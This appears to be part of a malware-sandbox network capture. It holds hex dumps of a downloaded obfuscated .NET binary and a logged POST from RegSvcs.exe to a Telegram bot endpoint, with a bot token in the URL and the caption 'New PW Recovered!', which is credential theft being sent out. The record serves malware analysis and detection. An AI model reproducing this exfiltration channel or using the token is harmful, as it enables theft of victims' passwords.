                                                                                        2022-08-08 15:18:10 UTC29INData Raw: 6e 61 6d 65 00 44 61 74 65 54 69 6d 65 00 63 6f 6d 6d 61 6e 64 4c 69 6e 65 00 56 61 6c 75 65 54 79 70 65 00 4e 6f 50 72 69 6e 63 69 70 61 6c 4d 61 6b 65 50 6f 69 6e 74 65 72 54 79 70 65 00 47 65 74 54 79 70 65 00 74 79 70 65 00 53 79 73 74 65 6d 2e 43 6f 72 65 00 52 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 41 74 74 72 69 62 75 74 65 73 43 6c 6f 73 75 72 65 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 00 67 65 74 5f 43 75 6c 74 75 72 65 00 73 65 74 5f 43 75 6c 74 75 72 65 00 72 65 73 6f 75 72 63 65 43 75 6c 74 75 72 65 00 47 65 6e 65 72 69 63 46 69 65 6c 64 49 6e 66 6f 43 6f 64 65 42 61 73 65 00 41 70 70 6c 69 63 61 74 69 6f 6e 42 61 73 65 00 52 65 61 64 4f 6e 6c 79 43 6f 6c 6c 65 63 74 69 6f 6e 42 61 73 65 00 41 70 70
                                                                                        Data Ascii: nameDateTimecommandLineValueTypeNoPrincipalMakePointerTypeGetTypetypeSystem.CoreRemoveNamespaceAttributesClosureRealProxyFlagsBadSignatureget_Cultureset_CultureresourceCultureGenericFieldInfoCodeBaseApplicationBaseReadOnlyCollectionBaseApp
                                                                                        2022-08-08 15:18:10 UTC30INData Raw: 62 61 63 6b 00 4d 61 72 73 68 61 6c 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 4d 79 53 65 72 76 69 63 65 73 2e 49 6e 74 65 72 6e 61 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 64 6c 6c 00 4b 69 6c 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 73 65 74 41 73 42 6f 6f 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 55 43 4f 4d 49 53 74 72 65 61 6d 00 65 6c 65 6d 00 67 65 74 5f 49 74 65 6d 00 53 79 73 74 65 6d 00 55 48 47 49 55 66 4c 6a 59 49 49 4a 72 75 74 46 43 50 72 5a 4e 6d 73 4b 4a 63 47 67 5a 4e 44 68 72 66 4d 68 4f 56 4e 65 46 54 52 72 43 4a 4b 62 54 66 63 75 4d 66 43 69 6a 77 7a 4d 5a 66 65 4b 45 77 52 4d 44 4d 4d 43 42
                                                                                        Data Ascii: backMarshalMicrosoft.VisualBasic.MyServices.InternalSystem.ComponentModelRealProxyFlagsBadSignature.dllKillMemoryBarriersetAsBoolMemoryBarrierUCOMIStreamelemget_ItemSystemUHGIUfLjYIIJrutFCPrZNmsKJcGgZNDhrfMhOVNeFTRrCJKbTfcuMfCijwzMZfeKEwRMDMMCB
                                                                                        2022-08-08 15:18:10 UTC32INData Raw: 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 4d 79 2e 52 65 73 6f 75 72 63 65 73 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 52 65 73 6f 75 72 63 65 73 2e 72 65 73 6f 75 72 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 69 6e 68 65 72 69 74 48 61 6e 64 6c 65 73 00 67 65 74 5f 4d 6f 64 75 6c 65 73 00 74 68 72 65 61 64 41 74 74 72 69 62 75 74 65 73 00 52 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 41 74 74 72 69 62 75 74 65 73 00 70 72 6f 63 65 73 73 41 74 74 72 69 62 75 74 65 73 00 6d 5f 61 74 74 72 69 62 75 74 65 73 00 47 65 74 42 79 74 65 73 00 6d 5f 69 6e 53 63 6f
                                                                                        Data Ascii: e.CompilerServicesSystem.ResourcesRealProxyFlagsBadSignature.My.ResourcesRealProxyFlagsBadSignature.Resources.resourcesDebuggingModesinheritHandlesget_ModulesthreadAttributesRemoveNamespaceAttributesprocessAttributesm_attributesGetBytesm_inSco
                                                                                        2022-08-08 15:18:10 UTC33INData Raw: 76 00 53 00 6a 00 5a 00 51 00 63 00 47 00 6a 00 44 00 4f 00 74 00 42 00 55 00 64 00 74 00 76 00 6b 00 6a 00 58 00 64 00 6f 00 46 00 46 00 63 00 4b 00 6b 00 70 00 55 00 4a 00 48 00 46 00 7a 00 58 00 48 00 65 00 63 00 61 00 42 00 72 00 64 00 6c 00 4f 00 4b 00 4e 00 4f 00 50 00 5a 00 41 00 79 00 72 00 65 00 4d 00 75 00 47 00 49 00 55 00 4c 00 78 00 7a 00 53 00 53 00 57 00 42 00 46 00 76 00 6f 00 47 00 6d 00 46 00 72 00 79 00 74 00 48 00 6e 00 76 00 74 00 7a 00 4d 00 6e 00 72 00 69 00 6e 00 79 00 75 00 76 00 53 00 6a 00 5a 00 51 00 63 00 47 00 6a 00 44 00 4f 00 74 00 42 00 55 00 64 00 74 00 76 00 6b 00 6a 00 58 00 64 00 6f 00 46 00 46 00 63 00 4b 00 6b 00 70 00 55 00 4a 00 48 00 46 00 7a 00 58 00 48 00 65 00 63 00 61 00 42 00 72 00 64 00 6c 00 4f 00 4b 00 4e
                                                                                        Data Ascii: vSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKNOPZAyreMuGIULxzSSWBFvoGmFrytHnvtzMnrinyuvSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKN
                                                                                        2022-08-08 15:18:10 UTC34INData Raw: 00 54 00 77 00 41 00 44 00 51 00 70 00 41 00 6d 00 59 00 7a 00 4b 00 72 00 7a 00 6b 00 50 00 67 00 77 00 4a 00 42 00 4d 00 64 00 6f 00 57 00 52 00 47 00 6e 00 53 00 4a 00 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 65 00 6e 00 72 00 65 00 79 00 6e 00 4c 00 74 00 77 00 64 00 46 00 42 00 6f 00 6a 00 6f 00 54 00 68 00 6c 00 4a 00 6a 00 4e 00 4d 00 51 00 53 00 55 00 48 00 4a 00 62 00 79 00 51 00 67 00 51 00 41 00 63 00 46 00 55 00 52 00 6b 00 7a 00 72 00 51 00 45 00 49 00 6b 00 48 00 41 00 72 00 6c 00 54 00 77 00 41 00 44 00 51 00 70 00 41 00 6d 00 59 00 7a 00 4b 00 72 00 7a 00 6b 00 50 00 67 00 77 00 4a 00 42 00 4d 00 64 00 6f 00 57 00 52 00 47 00 6e 00 53 00 4a 00 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 6b 00 00 80 a3 79 00 6e 00 4c
                                                                                        Data Ascii: TwADQpAmYzKrzkPgwJBMdoWRGnSJYggTPXcCkenreynLtwdFBojoThlJjNMQSUHJbyQgQAcFURkzrQEIkHArlTwADQpAmYzKrzkPgwJBMdoWRGnSJYggTPXcCkkynL
                                                                                        2022-08-08 15:18:10 UTC36INData Raw: 51 00 72 00 62 00 71 00 79 00 42 00 43 00 64 00 4c 00 50 00 74 00 55 00 55 00 77 00 6b 00 43 00 55 00 76 00 52 00 76 00 4a 00 50 00 54 00 6f 00 4f 00 53 00 47 00 50 00 50 00 65 00 74 00 61 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67 00 45 00 49 00 69 00 4a 00 77 00 66 00 73 00 5a 00 50 00 58 00 50 00 73 00 70 00 79 00 67 00 50 00 55 00 4e 00 6e 00 69 00 6a 00 54 00 46 00 6a 00 4e 00 65 00 46 00 45 00 4b 00 52 00 45 00 41 00 75 00 6a 00 69 00 65 00 64 00 58 00 4d 00 73 00 69 00 51 00 72 00 62 00 71 00 79 00 42 00 43 00 64 00 4c 00 50 00 74 00 55 00 55 00 77 00 6b 00 43 00 55 00 76 00 52 00 76 00 4a 00 50 00 54 00 6f 00 4f 00 53 00 47 00 50 00 65 00 72 00 43 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67
                                                                                        Data Ascii: QrbqyBCdLPtUUwkCUvRvJPToOSGPPetazkqrgJGklnDgEIiJwfsZPXPspygPUNnijTFjNeFEKREAujiedXMsiQrbqyBCdLPtUUwkCUvRvJPToOSGPerCzkqrgJGklnDg
                                                                                        2022-08-08 15:18:10 UTC37INData Raw: 00 68 00 46 00 41 00 4f 00 44 00 6d 00 62 00 46 00 64 00 4b 00 59 00 44 00 6c 00 46 00 76 00 65 00 47 00 00 80 a3 58 00 47 00 52 00 41 00 50 00 56 00 53 00 78 00 79 00 4f 00 6a 00 63 00 58 00 62 00 54 00 42 00 4b 00 41 00 5a 00 48 00 53 00 63 00 65 00 78 00 75 00 53 00 74 00 42 00 74 00 49 00 77 00 67 00 76 00 6d 00 61 00 45 00 54 00 73 00 5a 00 55 00 64 00 49 00 59 00 62 00 4c 00 4b 00 58 00 43 00 51 00 52 00 64 00 4f 00 4e 00 55 00 53 00 76 00 63 00 70 00 61 00 53 00 77 00 52 00 44 00 71 00 52 00 44 00 68 00 46 00 41 00 4f 00 44 00 6d 00 62 00 46 00 64 00 4b 00 59 00 44 00 6c 00 46 00 76 00 00 82 a9 74 00 78 00 4c 00 46 00 77 00 65 00 69 00 6e 00 61 00 55 00 41 00 78 00 79 00 52 00 63 00 74 00 4d 00 45 00 68 00 4a 00 64 00 63 00 6e 00 42 00 58 00 4f 00
                                                                                        Data Ascii: hFAODmbFdKYDlFveGXGRAPVSxyOjcXbTBKAZHScexuStBtIwgvmaETsZUdIYbLKXCQRdONUSvcpaSwRDqRDhFAODmbFdKYDlFvtxLFweinaUAxyRctMEhJdcnBXO
                                                                                        2022-08-08 15:18:10 UTC38INData Raw: 42 00 4a 00 74 00 4b 00 51 00 43 00 57 00 65 00 6f 00 43 00 64 00 61 00 65 00 77 00 50 00 59 00 41 00 67 00 52 00 4e 00 6b 00 76 00 7a 00 74 00 73 00 63 00 46 00 72 00 74 00 4e 00 4f 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48 00 45 00 64 00 52 00 59 00 53 00 48 00 44 00 55 00 6f 00 63 00 4d 00 79 00 6a 00 70 00 4e 00 41 00 61 00 79 00 79 00 49 00 65 00 65 00 6e 00 72 00 65 00 53 00 76 00 59 00 79 00 51 00 41 00 59 00 43 00 47 00 42 00 52 00 43 00 55 00 61 00 70 00 42 00 57 00 61 00 46 00 57 00 42 00 4a 00 74 00 4b 00 51 00 43 00 57 00 65 00 72 00 68 00 54 00 74 00 65 00 47 00 77 00 50 00 59 00 41 00 67 00 52 00 4e 00 6b 00 76 00 7a 00 74 00 73 00 63 00 46 00 72 00 74 00 4e 00 4f 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48
                                                                                        Data Ascii: BJtKQCWeoCdaewPYAgRNkvztscFrtNOztOXRHVHPHEdRYSHDUocMyjpNAayyIeenreSvYyQAYCGBRCUapBWaFWBJtKQCWerhTteGwPYAgRNkvztscFrtNOztOXRHVHPH
                                                                                        2022-08-08 15:18:10 UTC40INData Raw: 00 56 00 5a 00 6d 00 74 00 65 00 53 00 34 00 36 00 63 00 78 00 76 00 4c 00 5a 00 50 00 41 00 68 00 65 00 72 00 58 00 78 00 6f 00 52 00 64 00 4a 00 51 00 53 00 46 00 58 00 49 00 47 00 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75 00 5a 00 64 00 47 00 47 00 64 00 61 00 61 00 49 00 72 00 7a 00 44 00 64 00 44 00 46 00 42 00 45 00 50 00 53 00 77 00 55 00 56 00 56 00 6f 00 71 00 64 00 5a 00 6c 00 4d 00 67 00 6c 00 4b 00 6e 00 54 00 4f 00 72 00 7a 00 44 00 4a 00 4b 00 41 00 53 00 41 00 6a 00 64 00 56 00 5a 00 6d 00 77 00 6f 00 57 00 00 80 a3 63 00 78 00 76 00 4c 00 5a 00 50 00 41 00 68 00 65 00 72 00 58 00 78 00 6f 00 52 00 64 00 4a 00 51 00 53 00 46 00 58 00 49 00 47 00 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75
                                                                                        Data Ascii: VZmteS46cxvLZPAherXxoRdJQSFXIGIEhVdIBOhjduZdGGdaaIrzDdDFBEPSwUVVoqdZlMglKnTOrzDJKASAjdVZmwoWcxvLZPAherXxoRdJQSFXIGIEhVdIBOhjdu
                                                                                        2022-08-08 15:18:10 UTC41INData Raw: 6f 00 6d 00 65 00 4d 00 69 00 6e 00 52 00 64 00 57 00 6a 00 49 00 4b 00 75 00 4c 00 6e 00 76 00 6e 00 52 00 44 00 47 00 41 00 4d 00 45 00 46 00 71 00 48 00 6d 00 4b 00 71 00 4f 00 56 00 6c 00 7a 00 58 00 69 00 4e 00 77 00 6c 00 55 00 6f 00 48 00 4b 00 77 00 41 00 6d 00 47 00 66 00 47 00 50 00 4d 00 47 00 54 00 51 00 4d 00 6c 00 56 00 54 00 4b 00 41 00 61 00 42 00 47 00 6d 00 64 00 4f 00 57 00 66 00 58 00 64 00 76 00 79 00 43 00 53 00 50 00 79 00 4c 00 50 00 44 00 54 00 6a 00 78 00 42 00 50 00 79 00 49 00 73 00 73 00 69 00 6e 00 52 00 64 00 57 00 6a 00 49 00 4b 00 75 00 4c 00 6e 00 76 00 6e 00 52 00 44 00 47 00 41 00 4d 00 45 00 46 00 71 00 48 00 6d 00 4b 00 71 00 4f 00 56 00 6c 00 7a 00 58 00 69 00 4e 00 77 00 6c 00 55 00 6f 00 48 00 4b 00 77 00 41 00 6d
                                                                                        Data Ascii: omeMinRdWjIKuLnvnRDGAMEFqHmKqOVlzXiNwlUoHKwAmGfGPMGTQMlVTKAaBGmdOWfXdvyCSPyLPDTjxBPyIssinRdWjIKuLnvnRDGAMEFqHmKqOVlzXiNwlUoHKwAm
                                                                                        2022-08-08 15:18:10 UTC42INData Raw: 00 74 00 4e 00 42 00 71 00 6d 00 47 00 68 00 74 00 48 00 46 00 74 00 48 00 42 00 58 00 6f 00 6c 00 6b 00 76 00 64 00 63 00 55 00 4f 00 44 00 42 00 41 00 6a 00 76 00 46 00 51 00 4c 00 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74 00 64 00 53 00 6e 00 77 00 6d 00 45 00 49 00 54 00 74 00 76 00 6b 00 45 00 41 00 70 00 59 00 66 00 63 00 64 00 51 00 6f 00 50 00 48 00 70 00 6a 00 54 00 5a 00 69 00 43 00 4e 00 4c 00 6e 00 42 00 46 00 63 00 73 00 51 00 49 00 65 00 00 80 a3 42 00 71 00 6d 00 47 00 68 00 74 00 48 00 46 00 74 00 48 00 42 00 58 00 6f 00 6c 00 6b 00 76 00 64 00 63 00 55 00 4f 00 44 00 42 00 41 00 6a 00 76 00 46 00 51 00 4c 00 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74
                                                                                        Data Ascii: tNBqmGhtHFtHBXolkvdcUODBAjvFQLRyALIVhBOQQBMStdSnwmEITtvkEApYfcdQoPHpjTZiCNLnBFcsQIeBqmGhtHFtHBXolkvdcUODBAjvFQLRyALIVhBOQQBMSt
                                                                                        2022-08-08 15:18:10 UTC44INData Raw: 42 00 6c 00 51 00 71 00 50 00 44 00 65 00 48 00 76 00 56 00 70 00 77 00 52 00 77 00 71 00 47 00 66 00 6c 00 76 00 4a 00 6e 00 46 00 44 00 51 00 4c 00 5a 00 47 00 53 00 47 00 69 00 46 00 4c 00 48 00 68 00 72 00 75 00 48 00 58 00 41 00 48 00 6f 00 63 00 74 00 70 00 73 00 58 00 51 00 77 00 61 00 4c 00 6f 00 7a 00 49 00 4e 00 70 00 52 00 68 00 55 00 66 00 4b 00 53 00 68 00 57 00 4d 00 6b 00 65 00 6f 00 45 00 46 00 51 00 72 00 68 00 54 00 4e 00 7a 00 4e 00 59 00 51 00 53 00 55 00 6c 00 6a 00 57 00 63 00 42 00 6c 00 51 00 71 00 50 00 44 00 65 00 48 00 76 00 56 00 70 00 77 00 52 00 77 00 71 00 47 00 66 00 6c 00 76 00 4a 00 6e 00 46 00 44 00 51 00 4c 00 5a 00 47 00 53 00 47 00 69 00 46 00 4c 00 48 00 68 00 72 00 75 00 48 00 58 00 41 00 48 00 6f 00 63 00 74 00 70
                                                                                        Data Ascii: BlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctp
                                                                                        2022-08-08 15:18:10 UTC45INData Raw: 01 01 1e 00 1e 00 04 07 01 1e 00 07 30 01 01 01 10 1e 00 07 20 04 01 0e 0e 0e 0e 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 65 72 76 69 63 65 73 2e 50 72 6f 74 6f 63 6f 6c 73 2e 53 6f 61 70 48 74 74 70 43 6c 69 65 6e 74 50 72 6f 74 6f 63 6f 6c 12 43 72 65 61 74 65 5f 5f 49 6e 73 74 61 6e 63 65 5f 5f 13 44 69 73 70 6f 73 65 5f 5f 49 6e 73 74 61 6e 63 65 5f 5f 00 00 00 07 06 15 12 71 01 13 00 09 07 04 13 00 13 00 13 00 02 06 15 12 18 01 13 00 06 15 12 71 01 13 00 02 13 00 04 0a 01 13 00 05 20 01 01 13 00 04 28 00 13 00 04 20 01 01 02 05 01 00 00 00 00 0c 07 04 0e 12 79 15 12 7d 01 12 79 02 07 15 12 80 81 01 12 79 08 20 00 15 12 7d 01 13 00 06 15 12 7d 01 12 79 03 20 00 02 0a 00 01 0e 15 12 80 81 01 12 79 0b 07 03 12 79 15 12 7d 01 12 79 02 0b 00 02 01
                                                                                        Data Ascii: 0 a4System.Web.Services.Protocols.SoapHttpClientProtocolCreate__Instance__Dispose__Instance__qq ( y}yy }}y yy}y
                                                                                        2022-08-08 15:18:10 UTC46INData Raw: 80 ed 18 08 08 08 08 12 80 f1 1c 08 20 05 08 18 08 08 08 08 0a 20 03 12 80 ed 18 12 80 f1 1c 04 20 01 08 18 02 06 09 03 06 1d 05 02 1e 24 04 06 12 80 f9 04 06 12 80 fd 09 07 03 12 80 f9 12 80 f9 02 05 00 02 02 1c 1c 05 20 00 12 81 01 07 20 02 01 0e 12 81 01 05 00 00 12 80 f9 05 07 01 12 80 fd 05 00 00 12 80 fd 06 00 01 01 12 80 fd 05 08 00 12 80 f9 08 01 00 02 00 00 00 00 00 05 08 00 12 80 fd 40 01 00 33 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 54 6f 6f 6c 73 2e 53 74 72 6f 6e 67 6c 79 54 79 70 65 64 52 65 73 6f 75 72 63 65 42 75 69 6c 64 65 72 07 34 2e 30 2e 30 2e 30 00 00 03 06 12 60 08 00 01 12 81 09 12 81 09 04 07 01 12 60 04 00 00 12 60 04 08 00 12 60 59 01 00 4b 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 53 74 75 64 69 6f 2e 45 64 69
                                                                                        Data Ascii: $ @3System.Resources.Tools.StronglyTypedResourceBuilder4.0.0.0````YKMicrosoft.VisualStudio.Edi
                                                                                        2022-08-08 15:18:10 UTC48INData Raw: 00 00 00 01 00 00 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 c8 01 00 00 18 e5 00 00 28 01 00 00 00 00 00 00 00 00 00 00 40 e6 00 00 68 05 00 00 00 00 00 00 00 00 00 00 a8 eb 00 00 68 04 00 00 00 00 00 00 00 00 00 00 10 f0 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 f8 f2 00 00 a8 08 00 00 00 00 00 00 00 00 00 00 a0 fb 00 00 a8 10 00 00 00 00 00 00 00 00 00 00 48 0c 01 00 5a 00 00 00 00 00 00 00 00 00 00 00 d8 e1 00 00 40 03 00 00 00 00
                                                                                        Data Ascii: x(@hhHZ@
                                                                                        2022-08-08 15:18:10 UTC49INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 42 42 42 00 f1 ef f0 00 f6 f6 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: ( BBB
                                                                                        2022-08-08 15:18:10 UTC50INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff
                                                                                        Data Ascii: ( @BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                        2022-08-08 15:18:10 UTC52INData Raw: 77 77 77 77 77 77 77 77 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 77 77 77
                                                                                        Data Ascii: wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
                                                                                        2022-08-08 15:18:10 UTC53INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        2022-08-08 15:18:10 UTC57INData Raw: 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42
                                                                                        Data Ascii: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        1192.168.2.2249175149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:22 UTC60OUTPOST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da7964e1c1748c
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 1028
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2022-08-08 15:18:22 UTC60INHTTP/1.1 100 Continue
                                                                                        2022-08-08 15:18:22 UTC60OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 34 65 31 63 31 37 34 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 36 32 34 38 33 34 36 34 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 34 65 31 63 31 37 34 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 34 37 32 38 34 37 0a 4f 53 46 75 6c 6c
                                                                                        Data Ascii: -----------------------------8da7964e1c1748cContent-Disposition: form-data; name="chat_id"-624834641-----------------------------8da7964e1c1748cContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/472847OSFull
                                                                                        2022-08-08 15:18:22 UTC61OUTData Raw: 2d 2d 0d 0a
                                                                                        Data Ascii: --
                                                                                        2022-08-08 15:18:22 UTC61INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 08 Aug 2022 15:18:22 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 646
